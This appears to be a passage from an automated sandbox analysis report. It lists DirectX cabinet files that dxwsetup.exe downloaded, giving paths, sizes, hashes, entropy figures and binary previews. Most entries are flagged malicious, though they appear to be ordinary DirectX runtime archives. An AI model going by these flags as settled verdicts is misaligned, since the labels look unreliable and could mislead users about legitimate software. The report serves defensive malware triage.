                                                                                              Preview:MSCF.....w......D............................w...#..............w...7.........r2. .d3dx9_25_x64.cat..V:.7.....r2|. .d3dx9_25.dll......t:...r2X. .infinst.exe.&....V;...r2.. .apr2005_d3dx9_25_x64.inf......Y;...r2-. .d3dx9_25_x64.inf..q...9..[.... .cm......R.P...OB.."..AI5.]..."..UL.F.$.T.S*..iR..rJA.O9N/..jGJ.........\..=.....z.....5L..9.SA/&..,;e.l.@...C..Y..z...a}M...d..qh...:.'..@...o............T.{7..s.d1".........Y.*./.z..7(....N.k...,3...).h.>X..X...l.....A\p[....`y.......G..^d.c".j..k.....M...].ef.@..c...-.!.%O3.<G..B.y..A,.B..G%0..K...J...XX.Ig.|=.. ....#.t..>.#....S...^@..@.^m..@.l.....zI...y...L.Q.C.....x.[W..y..Z...o^.].G...G..4.q........o.xQA.....O...&B..s!......=Ovrtq.X.-}.u,k..:ju&m,$.5.V.T.z%......\.G.Dx...~-W.......... X.>.L...I.y?.f.1....4..J.b....%.e.t..U....o(..A...o.?.X..._?......).$.k.#..5o.>..&.0..a....8k....&E......$...Y..q.Y.....O...?...}}=.]'7.Knw....@.n.../.....".....RB.tg.._..Se'2.B)........6..p.K=......fz...z......I..y..uA

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2006_d3dx9_30_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1109261 bytes, 5 files, at 0x44 +A "d3dx9_30_x86.cat" +A "d3dx9_30.dll", flags 0x4, ID 6903, number 1, extra bytes 20 in head, 74 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1118429
                                                                                              Entropy (8bit):7.999050518080374
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:OreyPa6AC8e290lruGDhi3TSvHDh+ISNvRNhPmJ0RRuu:cNoeYEuTSvjh+R3WKRv
                                                                                              MD5:B3D644A116C54AFDA42A61B0058BE112
                                                                                              SHA1:9AF7DDC29EEF98810A1A2F85DB0B19B2EC771437
                                                                                              SHA-256:CA7B9C6A49E986C350147F00A6C95C5B577847B5667B75681A1EE15E3A189106
                                                                                              SHA-512:A2D2F12B7B37BD8F5C8465DD13AD31942DF11EE5ED5423DEEEB178E6B594587706D2C5116258BE1562CAA5ECA691358AF3CB83B77898D1012FF521017D199165
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............J..............44f .d3dx9_30_x86.cat..p$........4.e .d3dx9_30.dll......$....4.e .apr2006_d3dx9_30_x86.inf.....z.$....4.e .d3dx9_30_w9x.inf.....+.$....4.e .d3dx9_30_x86.inf.v..[>..CK..X.K..=.. ....+..MBI.. M@.n..QH0....#....c..b/..{.z....E..y.......N8?gg..{..=..{...W..;..:....IA.....a.`.......43GX..r..,.f...+FA..,.....2..a0..2......Z.ty.Ih...m0w..es0Ww.[/.n%q.Z.I...ho......#...G.....\.. 1.P6....;.s.cZ.......t.B...X...LL..X.C.......B.......~......@..!..8..O..O..!mR..fbb.0.8L.f..XO.R.-......Y...y...Q4."5JD...p..s.T.f.2z.6..~...........9VPR.f.BH=.bg.s,.T.!=......O..........B...||}...X..5]R.0.....c.+.4..S....E.7.y...[....3...2$..:qt...7T......Q..@X..Ji...q.Z8.Ea(..@zS.D.3;.b..a.}L.;..PG/-....(...../vL_...@K....c..&....f..y.....3.8fW:.T:N7..W:..t.t...#(.FK.k..X..&...;_...Be.w.....b6.z<..za..}_7.afQ......O{,..Thu...).'+..0{:.V}kI.&Z.JU&&*...B..[.'..t.vK.9.`]..!.)Vht.8e.\.T.....i......I.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2006_xact_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127143 bytes, 5 files, at 0x44 +A "xact2_1_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136311
                                                                                              Entropy (8bit):7.992811243778454
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:NqvFmCDJEmTNSPtjVgIc5Ul8IlTq3UJWaL6LHZF/U7a7b0qJFkd22ig3nQ1d7+Z/:NYmCyC5U+Il0yWYSMaXzkYQ3nWUZDuY
                                                                                              MD5:A2132A62F9AB0BDDC3207166DC014581
                                                                                              SHA1:53B19AC3E6C6752011BA641EE3C409ED10C95DD9
                                                                                              SHA-256:52C71C89CCC22FED3D7C985A22C464451AF34B63B3A26A3799BC25D881221EBC
                                                                                              SHA-512:76FABD7F440B6F9B409B0B2635EAD4EF332563A9BED738A722A7C6B9A077094154BF735CAF02C67191B08AB0A19FC03E05EF3D984F6E34DCF3BD587A05D2F424
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........47f .xact2_1_x86.cat..6..! ....C4-E .x3daudio1_0.dll.....V.....4.d .xactengine2_1.dll.W..........4.e .apr2006_xact_x86.inf............4.e .xact2_1_x86.inf...9..8..CK.|.\....l...X.".....Y.. y......EVI..... *.rzz..D..t.b....EO...((.S.TL.....]............u........j.{h......E..Q..E9.u..R).n.\E.a.N..30<.~UI.L.B...R.r.U...YJ.. .B...F..W3V..,..L,.g.S.G...\+.f...I.z.t*.JK.s(F. +....f.yBn...cv.-.. 7......n..0....9.<Q...za.$...0..}...n.J.s..@|d.H.b.,....c1..K..1>&....p.....Xh.?,._[..X......q...GT*7..2....V.l.....<(;@..?O.9)...k.%..8.. ..<[..a.T*h.2..........H.#.h...Qp[w3.A...f.!..ew..l.v....~...=..=`....".......z..d|"n......Q.EE..p4&Zz........?..@4;...k....x.R.H...p uf.7.yA..)....wRf/.."!...l..5.C..+..W.>..Zy.qj.....(.....{....4....`,...^.p'R.l.F..qP....{.nc."..m....5.".i.7.q.R...d/..f6..l..Qo6.......Fb]yn..U..lE~T..]..}........[!.....F.P..'...S.....V...w+....)..W..2*.B.J..In\]\....p.P.OK.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2007_d3dx10_33_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 689905 bytes, 6 files, at 0x44 +A "d3dx10_33_x86.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 9049, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):699073
                                                                                              Entropy (8bit):7.998968028413629
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SHwziN1v34WzSc6IA6ajvY8ov8ZdReUTQ8Mr47JYCophIa9sNDn1QcILtw6:V01wWzCI3ajjls4NpAsNDnMw6
                                                                                              MD5:F784B8A0FD84C8AC3F218A9842D8DA56
                                                                                              SHA1:FB7B4B0F81CD5F1C6A900C71BFD4524AF9A79ECE
                                                                                              SHA-256:949068035CE57BBB3658217EC04F8DE7A122C6E7857B6F8B0CA002EB573DF553
                                                                                              SHA-512:01B818AA5188CDE3504E289AEDCA2D31A6C5AED479B18A2C78271828AE04BEBCD4082051B7F4EECA8A31E8EE5ADBA158420ECDCB21371C735E4781EE5F661DBF
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............Y#..............#..............1....).........6{. .d3dx10_33_x86.cat.p%...)....l6O. .d3dcompiler_33.dll.h...2O....o6=. .d3dx10_33.dll............6E. .apr2007_d3dx10_33_x86.inf.I...7......6E. .d3dx10_33_x86.inf.i..........6E. .d3dx10_33_x86_xp.inf..j"(.2..CK.y<...........l.al..)e.!a.&...l3.-.h....j.,."D.R..O...%W).gFn........}.z5..<s..s>.s>..|...U*x...Z..!..E..U...<$.....y0.sPH)....<..<.4.M.@...U.......\).@..6.'.Yi.!.....R.@.&..X..i..z..Y....`...C...).Cz...p.9H$...t@....I.s....;.[.C+A"..<.7.w3..A..u...s8$....ma.Y5.3.e C.e.yAAP ...@L..8.,?..h.a..E2=..9=.......e5|a./3B"q....Zh.P...6P.."....k....:.w..:.h%.....H.0u......+..D.+!..-...9.sD...O...QZ.a..8v#......Q..N..l%....c..?P..........>.....~......0.F.VB!1ii..v5.4.R.R.....LX.X.........w.8.'.~..p.8.......A......6w.\...~..[.B.E.!..h....uQR..q.....O.....R......Cth-.....$z..B..00.l.Uo.. '..m..fB..}...ij....<..RX._......k .k1.xH......A3y.<~V>.s^gV.8+.;+...CP..+. &.....PH..).UA{...E..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2006_xact_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 131275 bytes, 5 files, at 0x44 +A "xact2_3_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):140443
                                                                                              Entropy (8bit):7.993872348182751
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZLkEev6VCdOQKPuF/p+emNC4J962LGMlPj6MoCW37gwND08:ZLkEeKCdsPufE59tLGMpxobsG08
                                                                                              MD5:E16F0875713956A6F9CD8C5ACAD36E51
                                                                                              SHA1:984B821EAEF3B549CE0B12F72A405A93E51A9DFE
                                                                                              SHA-256:31B16F93BE7F5F9BB78E9ECE6DA96565D50A0BC1F66B206B7A21C601A308DC53
                                                                                              SHA-512:DD626D5552EAF0C1DBD32BC4DD84811BACE74C6350EDDAC692D3C3E8C393F4A19C26E8F2932F54A14648448912E6B87C796C6EEB6DA9B2C55EC4565983B76189
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........4.R .xact2_3_x86.cat..6..! ....C4-E .x3daudio1_0.dll......V.....4.K .xactengine2_3.dll.W..........4{R .aug2006_xact_x86.inf.....`......4{R .xact2_3_x86.inf..v`..8..CK.|.\S...M..ABS............ M....%J3...EP....]W,.X..............]El.;s..t............9s.3g.9wf.#.....W.X...K-..t..>.B.v..t..;....._...C.S.\.)%y.*...Y:.Z .B...<...M^..N....e..v5.]pWG7.+..7........2.<..=...`n..s.'..1w..R7x.!.A..u.H.0g.....~<H.....C.?@]1.......R...<.....m.M...I.B..L..c).....~.m;..M].L......].........+..GT*w..n....!. .3...0Gl .&..;....E..ZW...........+..,*..Z....#bG.v.2...R.~...`.p.....?.q......6.$[.+.8 .............V4...\|Q.Q.....A..^4*........A.o.,.....O/X..^..5.r.....XQ.iGh.|I...r.A:'.p!u.L>.\..i...HgN...)q..q7.c..w...Pbm..a.O%y.......X..ne....2. ...w...`.:..5....]p'.......X.k.Hv..nGR.x..p.-..f...lB.QG6.........`.yn..c..4m.].].]..cXI^....N.=..F.P...-.].....fj..w3n...)..W.r2*.".:&.1|..n..L.V.P"

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2006_xinput_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40098 bytes, 4 files, at 0x44 +A "xinput1_2_x86.cat" +A "xinput1_2.dll", flags 0x4, ID 6335, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49266
                                                                                              Entropy (8bit):7.9632460736333766
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:OuG396sAA1wXXvVFc2755DkphtVmUkt/lnkvH0odpl/q1nk:vwQsAhFcSmpJ3kt/xcd7ek
                                                                                              MD5:16B968CA0C435EE45E77A84C2D0364A9
                                                                                              SHA1:90B17A60A34F6335787A6B2D489CBCD3A4EA98C8
                                                                                              SHA-256:6DD7C0ABE37D3DF7AA6DB7BB352260F4A15DC965FF9D30AA32FE9595C1A18300
                                                                                              SHA-512:3BBBFDF8B5673641EC066C3FB52E6B0D5CE0BC6ED6BFF17AB4AC3FA69A8628B09E5EC8322FC39D2A206974B54D297CAAFF9410197E26D090FE74F963CD535045
                                                                                              Malicious:false
                                                                                              Preview:MSCF............D................................#.............................4.R .xinput1_2_x86.cat............4.K .xinput1_2.dll............4}R .aug2006_xinput_x86.inf............4}R .xinput1_2_x86.inf.....>..CK.|.\SG..M.. @...mTT.0.(..D..M...+K0 ..D.`...T.Zkk.Am.V..k...V[l...+....*Z4....P..........&w.3g.9..\.Kz<tp..N.;.]Y...%=.!...b.............%v_88.t`qXK.;......B..3..c.8...................a...aA..C..)t...FP.q.%......'.B...("...D0.(..Al(..BY.<..."...s.!...1....&."...a..;6;h.P.#.X...p.H....c..q,..1.'..^.CL..h.C..h.%......f...S.l.'h.p.p.E.......\..G..1..'.)D>.Cd.JB..u.....6..i..A.>...&.......]..J....C..h."........x.......4....0.H.?..P.=.Z"zEaJU...F./...Y.t...~.o.y9<..9.l..7=.9_..d...!.r.F0...4..c2...a.3..y0..B..nD<.K...s!d.9|...p.0|a.U.a.=x.v$.OM.1u{...qQ,..._.R....y..f"...33...@... ......[..1.a.....0.x8..@.N.`i..0...b..c.wYs.L>&..9..A.......UXL.n..8x.....z......W+..... o.'.v.r...$g....R...4.u.r..J.P+......./o:C...Sg.g.&.3r..^.vG.v^...I.s...9..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2007_d3dx10_35_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 790907 bytes, 6 files, at 0x44 +A "d3dx10_35_x86.cat" +A "d3dcompiler_35.dll", flags 0x4, ID 9055, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):800075
                                                                                              Entropy (8bit):7.9986813742013325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:iTo6mZ4UtaxS5hNsXjnUQEnnR62vSNE6xr8M6:iTdwtqAUXjU7nQaSNvxo
                                                                                              MD5:DDC4AF0D53B477E5AF77942E7118B66E
                                                                                              SHA1:81AD8201DCF653A6E977C4506A274D0BAC12643C
                                                                                              SHA-256:9536166EE7CC1100CFE24E01532E8E4DEED6BAA838B4C025581F2CA046A25915
                                                                                              SHA-512:1E082D7E7855BC0AF6EC09D4A69FD4A1B0A3A31E4DE8FAA52FA0BDCD601C501ADA6216DDDB83058F37AB4A371068E0F344BDF42F2551943BE19BD719D99BA93C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....{.......D..............._#..........{....#..............8....).........6P. .d3dx10_35_x86.cat.p....).....6. .d3dcompiler_35.dll.h...2......6. .d3dx10_35.dll.c..........6F. .aug2007_d3dx10_35_x86.inf.I..........6F. .d3dx10_35_x86.inf.i...F......6F. .d3dx10_35_x86_xp.inf.. ......CK.y8............H.<3.1....=...`.&&[...m^...&D.l.%Z.TJ).....%.R..L...z.....{u]..<...y.....qn...e5\..1.1.....L.b.*D".x~....4....@0.....@#XD>D&.].T..........K..,.<(.81A.z.]..A....0.......Y.l......F[.C...R.`...8...$...A....2..8-..F..e.=j.J.ud..dM.I.........!.h..l.+..,....t9..r..!_h.D.. ..,3..hQsQnYE.+V.wL....;.....3#B"...Zh'...........2.Hx.....:2.%......:.&..'... .!.H.%.<..Tj......A3C.W..e....Dpe...]....!....&H.....I..~d...$C }.>.#...}3....X}.F..G!1....r6...WD.....L}.K..t.....)#...6.L.&...........)....9.!p.b....x.....{..f........s.a.U..^..,..3?.............Ck.....!.s.......`.oZk............K[i.g.....E7...f.7f...`.....3...F.....i.?K&.....d.,Yk.L...........,.L...D.Au..].8.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2008_d3dx10_39_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843207 bytes, 6 files, at 0x44 "d3dx10_39.dll" "D3DCompiler_39.dll", flags 0x4, ID 8952, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):852375
                                                                                              Entropy (8bit):7.998886184584254
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:E6Ih4DqlkwAjhr1mB+uYgrCvCZNmJ9ndKo4XYbX:E664DQkwAj/oNCvCZIdN4ID
                                                                                              MD5:5380053AC4C344BD38604022476B1C1D
                                                                                              SHA1:043DC8F49BCA3BF0BD85E858F5C2EEDF68565C0D
                                                                                              SHA-256:84800C55F773D5D6913E344E41BABA58CF07CEC2E6C7114CA3BF48E8F355419F
                                                                                              SHA-512:F3CE2DEF6E2E8A1D2C07F627E3C437A1BBA0B2E456020A84121346472BE3D28E0FC69623BD408F35A2C639C83DD2787F998DEDFE42B7625DC71500824B035FEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................"...............#..............=....$.........8 X..d3dx10_39.dll......$.....8.X..D3DCompiler_39.dll.f(..(......8.2..d3dx10_39_x86.cat.I..........8.2..d3dx10_39_x86.inf.i..........8.2..d3dx10_39_x86_xp.inf.c...@......8.2..Aug2008_d3dx10_39_x86.inf.,"..%,..CK..\.....\./.R3...$...Hef.K0..D<....V..uvA4.J.yTx..YjvY..<.2.133.J.[...O.g.Q.J..gf.....r^.}..s~g..3...F..!...eB>$.e .~..Z.j@V....C]..-..-N.!.Dc.c2.lv..!0b......$&.n.....yH..cz./...|...w.;y../+.......l.|~...?...{..-<Us.(n..M.U...(Bz.I.WCc.q.I..uuu....2O.K}.~_x...P..B.D.P.].C-e..O..x.tJ.....Y....'o5%dE...+..../..".tp...Ap..i^.$.0W.....!...b../.W..y.B.....#.m.k}O.k..z...N........W.3.......S.F..].E..j,.;.xe..I`6p.V..._O..K`.H.C....f.....'..3@?@O..`...@&p..P...W..>HO.....,..CA........0...m.....D....0.....x.S...l.....'....`.....%....{....1y.t...Qp.t..{..A.0c.......k.....@!x......RA/.....@c......}...n.......`.x.L.cA...A ...P..S....2}{%".,....d8..^.K..p.xGE...+..\`:X.>.G.o.Y

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2009_d3dcsx_42_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 3313780 bytes, 5 files, at 0x44 "d3dcsx_42.dll" "d3dcsx_42_x86.cat", flags 0x4, ID 7865, number 1, extra bytes 20 in head, 169 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):3322948
                                                                                              Entropy (8bit):7.9992960947448655
                                                                                              Encrypted:true
                                                                                              SSDEEP:98304:hd4ZyuDJf9oMm+hWh3ZHD8VZQCbsY/ny66RHX:BuD8b2WUZQCg+ny/
                                                                                              MD5:73BA11CE0E936726FC9FCB882F8B91EA
                                                                                              SHA1:4A4BABE3AC751E60AE6B5B0D69C93FA53D7FCD21
                                                                                              SHA-256:A9A704B73531D6BF59A421AB5C046C19A16D2B0B07F09816DBE9DA4550A24B17
                                                                                              SHA-512:9A198EB93D5623651D2981A277EAB4C345C08161254D0127D90C97344450AC1A7FD5C8AC840048A43A347E3296B286B646EA0FBA88F0C7BCE1CEED1484112D56
                                                                                              Malicious:true
                                                                                              Preview:MSCF....t.2.....D...........................t.2..#..................`.S.......$;....d3dcsx_42.dll.....`.S...$;...d3dcsx_42_x86.cat.......T...$;...d3dcsx_42_x86.inf.(.....T...$;...d3dcsx_42_x86_xp.inf.c.....T...$;...AUG2009_d3dcsx_42_x86.inf.?b5B.]..CK.w\T..7.Mnb.QA..E..Q .B...AD..X.q.JS.H..&&.....HS... .a.n.((..J/....!R.a.y..g0......<....9.}.^{.....do3.sb........PL....V......_.|)V..w.a.d.>.#~k.......Z.t.......e.o...#.k.,..x.8.(/\.......5.4....?.Z.B;.9;t/....@..^&..C...m.........f.....#N..._e.c(&f....].-|.....>X..?>..S.#&..!..v.BLl1*b.^.&....},..r|4...}Dy...@....\,.^..R....#v....Gl..j%v..w.k...^.....(...........l..m..,............k..J ..?.o.FL.{e........Cj.{..=.-&.oe_?_'8's....~..k.o.}]<}.a.^jnb.....j...........U..3p.....]pl.C..)8.....#V.G..Yp\.#....0.C..q8...#6.G+..p..:...)....#..G8...H.#..z8..x..8._.;Rp......8.....A8hp..#..Sp\.#..Ox....8..0.c3.RpLk.<.x..-8R.#....q..x..~.?}]Jz.bU8L...........j..z.K...6.{Cl..6.sVsV.Z.....sGUrE;..'..a.#>.._Q.U}....sb.\....}-A.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\FEB2007_XACT_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 142023 bytes, 5 files, at 0x44 +A "xact2_6_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7329, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):151191
                                                                                              Entropy (8bit):7.993972565562067
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:4uMWvVgAanBDv9WkUtrr/uZfQMyolbnXkFDwoY0ZwuY:BVgAutNUtrLuZfjjljgTY0JY
                                                                                              MD5:A09F7EAB35816D682E7432DBB36B047D
                                                                                              SHA1:DB67B9434ABAA8E7F166956A1C8D01F536162C21
                                                                                              SHA-256:0E3655490667DDF17150AEC089889268BDD7F1E8367D2BED6F3EB68A5FF28288
                                                                                              SHA-512:FB1CDBFB3CDD60783D1C8696EA6EFB746331880C79AA74052808CA09092CF1A2336BF784104D16203740998129B718DC0AD4A632E4031E85CCF340C593F05E57
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....*......D............................*...#...................)........86u| .xact2_6_x86.cat..;...)....(6.{ .x3daudio1_1.dll.h....d....86o{ .xactengine2_6.dll.W...&L....86.{ .feb2007_xact_x86.inf.....}R....86.{ .xact2_6_x86.inf.;{..w?..CK.wXSI..o..HQY....r..!. .....TV..0..$tTB.....(..((J......(.R.qm.E.d.... ......~...y..93..3gf~.!..Y...^..&.7q. .... .J..`.QPX..-....0... .-.C.b."0N...R.b."..b0.r..U..V.....1..ql.8..1X}.....o.%.t.."B...2...,..@...x..p..0.........AZ.D., ........x.,..C...0.k....aH.........U.V.V.....0....P...6..PeN.........../.-.^.x..z}....q........$h08..3.I,..r.........4......!...oh...x.&.C@....p(J0M....d.5......,..XHC....jf.....A.=(..P.CF..}...[..>...?.9$...K....ofa.......5.p.....g.`T.v.{Ks...."2.N..3.2.<.....x...m.y.B...=....k..|%B....!.y...kq..7..{.....j.W).,.>..>.......@..9.A...2..,.8.t`-d+.z....`.....0....6.......{.....X.0q....98.@V.....C 3v..o.x`.#..r.".`V...s.....?G6.#..2.pb.......$.....@...b.n..&....W.._..CB..c..%...HQ.U

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Feb2006_d3dx9_29_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1356836 bytes, 5 files, at 0x44 +A "d3dx9_29_x64.cat" +A "d3dx9_29.dll", flags 0x4, ID 6656, number 1, extra bytes 20 in head, 120 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1366004
                                                                                              Entropy (8bit):7.99967777757325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Qllh+6W44yAAf47xvIWTTbTpHe3Agqqvx3C86vBOZw1b4oWU+vz3zJvxfIc:Qh4DhlgWRHeQgtvx3FABOCth8vzN7
                                                                                              MD5:33618039DAC4E97C813E5BC1A499E6C6
                                                                                              SHA1:C792B9D0134DF698476C2FA4179DE6BCE8AA583B
                                                                                              SHA-256:A5FFAF9D58DA5D79402C4DC93E79960F971D2701D4651BB33D18925AF641F11D
                                                                                              SHA-512:35B490903721CA5FAEF73815D4F9C6F52EFAB1FE82A4FDBD7566A1B028525AFD29A72DC68D4B7D219CFA5CB33FEC241D6B2784F15F9795D368DC356B3DF30B5D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....$.......D...........................$....#..............x.............C4.F .d3dx9_29_x64.cat..t:.......C4nE .d3dx9_29.dll......:...C45E .infinst.exe.......;...C4iF .d3dx9_29_x64.inf.&...2.;...C4iF .feb2006_d3dx9_29_x64.inf.l..3.9..[.... .q..@..$Q.P...>..$....)......2.k..LJ.].-.K+.E-h.k/Z.....Z..=....... b..=.o...........$.h...bT'7f.Q..2..;.o...M<C.u....xx..%..Z><..!_&'.Xq1E.Q...Q..[vP...d.I...........".(n(.....n.M....XA..J..C. ...c\*.....<......w.r..I.m..FM#....f..tdbdPR..Si:.:BQ...."..-.%...1U%.."Y..B.%.xF&S.V.<.).......6.^...D.(.eI.`.".p..?b..';.$..X.......H...$+...E....:_.b.(.0JF..E.w_..,..+.....$....+..AMBP..f.5..'....3 n.|...B ...0....t,.j.N..v}...WG.L.]..l....Q5..5..B.....X...^....U.~.x...%.....&wG/.5t.........T..G>.YjJ.].[..M^O......;.,.....]...1..__.K)sy...?.s.%.u.....a...!~..8.......F.^.%)N..c.J#....).`-.lz.T]..._..{..4...z?..p...H..%9)....y2.......S.{..h.K.....toRgh......D.V..%.?.|.?V.Vr1.......Jd..zz..C(.'...,.!.X.-..o....O...V!"..8..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\JUN2007_XACT_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 146949 bytes, 6 files, at 0x44 +A "xact2_8_x86.cat" +A "x3daudio1_2.dll", flags 0x4, ID 9016, number 1, extra bytes 20 in head, 10 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):156117
                                                                                              Entropy (8bit):7.994909703055095
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tG7RXkNHRrOaYVD5yEThWmLksx2MeEm6oOD4+3y20OXtGhlYRTPZDT5P/lJXptA:eX8KVD5yETfLksAMUHo4+T5IhlYRDZDy
                                                                                              MD5:001CFF513A31EE082133E7BA3B0D71A2
                                                                                              SHA1:4517610A25239A16C26CA9890E1F0E52DDA3781A
                                                                                              SHA-256:245B0C554CBE2677939A70E5C4C6666B1B43D10D47980223F8CDEADB2D0EB76B
                                                                                              SHA-512:7119F6CA16FE6D968310F34828F30D8144531B89583CFD529056D2E31D5164FC65136FA9015B69849F724EC641A9291AC644C91CC3FA8EBDD4DAF9CF5A665A7F
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....>......D...............8#...........>...#...................).........6.. .xact2_8_x86.cat.hG...).....6.. .x3daudio1_2.dll.h...*q.....6. .xactengine2_8.dll.o..........6.. .jun2007_xact_x86.inf............6.. .xact2_8_x86.inf............6.. .xact2_8_x86_xp.inf......4..CK.|.@S..I..........c....B(..........A..{..b...;XA.`.r,...Q..l.gO@.|....w....svw........8........:.~P.t..d.....T..+GIQah7......_WT..H.S2.)...R@..0...L...R+.;..=.....\.).Y.K.c.1..q.M.&.c9.:.S.WZ.'.b@.2.....q..].1!.F.=.`v.)..9.....1y...&P.....,IN.f.q...}8*.......p......... .~...;.8.'...PC...L...F....F.R1N.1....8...I..*.FU((........X(...bQ.......G.......O...`lj..F.l.>..AS.t/s._.!..{Rv!\MArc.DR.AZ.P....=`..{....-j..!M]..0.o.'gX.L..R..:...k<-.....p.......... .1)....m3.).._1..K.R7.@n.7.......0&d.....,..a.L.I,...?..>..F..8l.....=7Gr?.*.`../...!.9...0o,.s.^I.QT:..Q.t.........D.IR...b,..V[..M....j.....?.I.$..w`.#..\....B.aX{.C....V7.P7.P..P.$..V....AL..I.X@.R.TU.......^.k..{..|...:..8.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Jun2005_d3dx9_26_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1058965 bytes, 5 files, at 0x44 +A "d3dx9_26_x86.cat" +A "d3dx9_26.dll", flags 0x4, ID 6937, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1068133
                                                                                              Entropy (8bit):7.999040217820951
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NxFMsUF1MmwONoWu85w6SFBu+vveJ0sut3z2A1s9z/D8gigA:V3dm3NoW+9FBhuJ9ut36A1s9z78giP
                                                                                              MD5:029359EBCA4BA5945282E0C021B26102
                                                                                              SHA1:6107919F51E1B952CA600F832A6F86CBBED064B5
                                                                                              SHA-256:C44EABF5BE3B87CD845950670C27F6A1E5D92B7758BA7C39C7849B1EE1C649C0
